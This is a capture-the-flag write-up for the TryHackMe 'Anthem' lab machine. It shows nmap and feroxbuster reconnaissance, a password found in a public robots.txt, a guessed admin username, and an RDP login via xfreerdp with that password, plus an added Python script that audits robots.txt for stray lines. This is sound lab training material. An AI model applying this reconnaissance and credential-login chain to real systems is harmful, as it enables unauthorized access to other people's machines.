TryHackMe Anthem

nmap

nmap -sV 10.10.13.83            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 18:24 EST
Nmap scan report for 10.10.13.83
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds

feroxbuster

feroxbuster -u http://10.10.13.83 --status-codes 200

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher                   ver: 2.10.1
───────────────────────────┬──────────────────────
   Target Url            │ http://10.10.13.83
   Threads               │ 50
   Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
   Status Codes          │ [200]
   Timeout (secs)        │ 7
   User-Agent            │ feroxbuster/2.10.1
   Config File           │ /etc/feroxbuster/ferox-config.toml
   Extract Links         │ true
   HTTP methods          │ [GET]
   Recursion Depth       │ 4
───────────────────────────┴──────────────────────
   Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      126l      323w     5344c http://10.10.13.83/
200      GET       92l      186w     3414c http://10.10.13.83/search
200      GET      103l      185w     3486c http://10.10.13.83/categories
200      GET      104l      188w     3589c http://10.10.13.83/tags
200      GET       30l      162w     1864c http://10.10.13.83/rss
200      GET       10l       19w      379c http://10.10.13.83/rsd/1073
200      GET        6l       16w      325c http://10.10.13.83/opensearch/1073
200      GET      145l      403w     6207c http://10.10.13.83/archive/a-cheers-to-our-it-department
200      GET      148l      378w     6147c http://10.10.13.83/archive/we-are-hiring
200      GET       18l       19w      829c http://10.10.13.83/wlwmanifest/1073
200      GET      126l      323w     5389c http://10.10.13.83/blog
200      GET       95l      189w     4078c http://10.10.13.83/umbraco
200      GET       92l      186w     3464c http://10.10.13.83/Search
200      GET       29l       34w     1035c http://10.10.13.83/sitemap
200      GET      126l      323w     5389c http://10.10.13.83/Blog
200      GET        1l        1w     3276c http://10.10.13.83/umbraco/Application
200      GET      125l      835w    74454c http://10.10.13.83/media/articulate/default/random-mask.jpg
200      GET      111l      205w     4110c http://10.10.13.83/authors
200      GET       30l      162w     1864c http://10.10.13.83/RSS
200      GET      111l      205w     4110c http://10.10.13.83/authors/

more enum

curl -s http://10.10.13.83/robots.txt
UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
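
The stray first line of that robots.txt is the finding: it is not a directive, and the file is public. As an added example that is not part of the original writeup, this Python script embeds the robots.txt above as its sample input, separates real directives from lines that do not belong in the file, and lists the Disallow paths a reviewer should look at first.

```python
import re

# robots.txt exactly as served by the target above (sample input for this example)
ROBOTS_TXT = """UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
"""

# Directives from RFC 9309 plus the common extensions crawlers honour.
KNOWN_DIRECTIVES = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay", "host"}
DIRECTIVE_RE = re.compile(r"^\s*([A-Za-z-]+)\s*:\s*(.*)$")


def audit_robots(text):
    """Return (disallowed_paths, stray_lines).

    disallowed_paths: every path the file tells crawlers to avoid; this is
    the list an attacker reads first (admin panels, config directories).
    stray_lines: (line number, raw text) for lines that are neither blank,
    a comment, nor a known directive. robots.txt is world-readable, so
    anything that lands here is content that was never meant to be public.
    """
    disallowed = []
    stray = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # a comment runs to end of line
        if not line:
            continue
        m = DIRECTIVE_RE.match(line)
        if m and m.group(1).lower() in KNOWN_DIRECTIVES:
            if m.group(1).lower() == "disallow" and m.group(2).strip():
                disallowed.append(m.group(2).strip())
            continue
        stray.append((lineno, raw))
    return disallowed, stray


if __name__ == "__main__":
    paths, stray = audit_robots(ROBOTS_TXT)
    print("Disallowed paths (hidden-surface hints):", paths)
    for n, content in stray:
        print(f"line {n}: not a robots.txt directive, review it: {content!r}")
```

Run against a live site by replacing ROBOTS_TXT with the body of a GET /robots.txt; any non-empty stray list is worth a ticket, since the same leak that gives an attacker a password here is trivially found by a scanner.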

The poem is written by Solomon Grundy

The email address found is JD@anthem.com

So, by the same initials pattern, let's assume the admin (Solomon Grundy) is SG@anthem.com

RDP

xfreerdp /u:SG /p:UmbracoIsTheBest! /w:1366 /h:768 /v:10.10.13.83:3389

[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory [/home/kali/.config/freerdp/certs]
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/server]
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - CN = WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.13.83:3389) 
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - Common Name (CN):
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] -      WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.13.83:3389 (RDP-Server):
        Common Name: WIN-LU09299160F
        Subject:     CN = WIN-LU09299160F
        Issuer:      CN = WIN-LU09299160F
        Thumbprint:  d9:e0:d8:b4:43:5b:05:61:33:83:fd:44:fa:47:c5:ec:8d:64:52:64:17:28:f8:e4:f8:32:85:eb:87:83:ff:f6
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[18:41:46:646] [50537:50538] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[18:41:46:647] [50537:50538] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx

After that things are easy: the admin forgot his password in a backup file.
